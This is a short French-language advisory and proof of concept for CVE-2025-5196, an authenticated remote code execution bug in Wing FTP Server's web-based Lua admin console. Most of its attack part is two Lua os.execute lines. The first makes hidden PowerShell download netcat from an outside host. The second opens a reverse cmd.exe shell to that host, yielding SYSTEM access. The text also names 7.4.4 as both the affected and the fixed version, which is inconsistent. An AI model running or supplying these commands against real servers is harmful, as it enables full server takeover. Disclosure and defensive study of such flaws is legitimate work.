
Wing FTP Server fournit une console de script Lua administrative accessible via son interface web. Les administrateurs authentifiés sont capables d'exécuter du code Lua arbitraire avec un sandboxing insuffisant. CVE-2025-5196
Wing FTP Server fournit une console de script Lua administrative accessible via son interface web. Les administrateurs authentifiés peuvent exécuter du code Lua arbitraire avec un sandboxing insuffisant.
Version affectée : Wing FTP Server 7.4.4 (Windows) | Authentification requise : Oui
Jusqu'au 24 mai 2025, la dernière version de l'application fournie par le vendeur peut être trouvée au lien suivant : https://www.wftpserver.com/download.htm
De plus, on peut noter que jusqu'à la même date, une note de version a été publiée indiquant que la vulnérabilité RCE a été corrigée dans la version 7.4.4. Le lien vers les notes de version se trouve ici : https://www.wftpserver.com/serverhistory.htm

Preuve de Concept liée à CVE-2025-5196 VulDB

Wing FTP Server Web Interface


La première partie de la commande téléchargera nc.exe (netcat pour Windows x86) vers le chemin "C:\Users\usuario\Desktop\Drops". La seconde partie exécutera nc.exe 192.168.234.131 4443 -e cme.exe.
os.execute('powershell -NoP -NonI -W Hidden -Exec Bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://192.168.234.131:8000/nc.exe\', \'C:\\\\Users\\\\usuario\\\\Desktop\\\\Drops\\\\nc.exe\')"')
os.execute('cmd /c powershell -NoP -W Hidden -Command "Start-Process \\"C:\\Users\\usuario\\Desktop\\Drops\\nc.exe\\" -ArgumentList \\"192.168.234.131\\",\\"4443\\",\\"-e\\",\\"cmd.exe\\""')

Shell NT/SYSTEM
